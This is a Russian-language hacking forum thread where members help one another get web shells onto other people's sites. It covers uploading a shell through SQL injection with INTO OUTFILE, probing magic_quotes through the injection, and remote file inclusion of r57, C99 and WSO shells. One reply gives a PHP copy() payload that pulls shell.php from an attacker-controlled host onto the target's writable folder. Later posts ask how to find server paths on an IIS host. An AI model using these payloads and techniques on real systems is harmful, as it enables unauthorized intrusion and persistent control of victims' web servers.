Для залития шелла через into outfile, тебе обязательно нужны привилегии File, magic_quotes = off (в некоторых случаях можно залиться и при magic_quotes = on), абсолютный путь до папки доступной на запись.
Как узнать включены ли magic_qoutes и allow_url_include еще было бы круто опен_бейсдир например узнавать? может есть тулза\скрипт, который выдавал бы эту нужную информацию?
Обычно на сервере не хранят такую информацию (phpinfo()), например в файлах указанных нижу. Но если админ нуб, это реально. При открытии phpinfo() увидишь, то что тебе нужно. Magic_quotes включен/выключен можно узнать прямо в скуле. Достаточно узнать колонки любой таблицы, например "where+table_name='users'" и, если тебе вывелись колонки users, то magic_quotes выключен.
Здравствуйте!Я уже писал ранее: Подскажите, пожалуйста!Cитуация: Имеется инклудовый сайт, захожу на него шеллом так- site.ru/index.php?page=http://myevilsite.narod.ru/shell.php Открывается полноценное окно шелла.Но, как только пробую выполнить команду или скачать файл, вылетает из шелла обратно на страницу уже без шелла. Пробовал и r57shell 1.24 и другие, одинаково. Может быть сможете что-нибудь посоветовать. Windows NT VIA-008 5.2 build 3790 Microsoft-IIS/6.0 Сейчас обнаружил, что могу выполнять некоторые php сценарии, кроме создания и скачивания файлов. Подскажите, пожалуйста, возможно у кого-то есть, какие-либо идеи на сей счет. Заранее большое спасибо.
попробовал.к сожалению asp шеллы дают тот же результат, создание и скачивание файлов не удается выполнить((((
2against Попробуй сделать так: 1) Ищешь на сайте папку, доступную для записи. 2) Пишешь в http://myevilsite.narod.ru/123.php такую прелесть: Code: <?php copy("http://myevilsite.narod.ru/shell.php", "папка/доступная/на/запись/321.php"); ?> 3) site.ru/index.php?page=http://myevilsite.narod.ru/123.php 4) site.ru/папка/доступная/на/запись/321.php Тут должен находиться полноценный шелл.
На народе ничего не будет выполняться. RFI заключается в том, что удаленный скрипт выполняется на сервере. Следовательно сервер, на котором находится сайт site.ru считает с народа файл 123.php и выполнит его, скопировав файл shell.php в папку, доступную для записи.
Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
так через шелл заинклюженный посмотри. Или мозгами пораскинь, где могут быть папки, доступные для записи: в /images/, /uploads/, /files/ и т.п. Если сайт с возможностью публикации контента, файлов и картинок, то пути в html-коде сайта глянуть можно. А почему у тебя не работает шелл приинклюденный (site.com/script.php?page=http://site2/shell.php). С99, да и wso нормально в таком режиме работают.
Попугай, затруднение в том, что сайт совсем статичный, в шелле не показывает не одной папки доступной на запись, все инклуды извне не получаются, как и скачивание, вероятно как-то режутся фаером. По-ходу на этом сайте ниче путного не прокатит, только если MySQL ковырять(((((( Всем большое спасибо за помощь, и советы)))
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
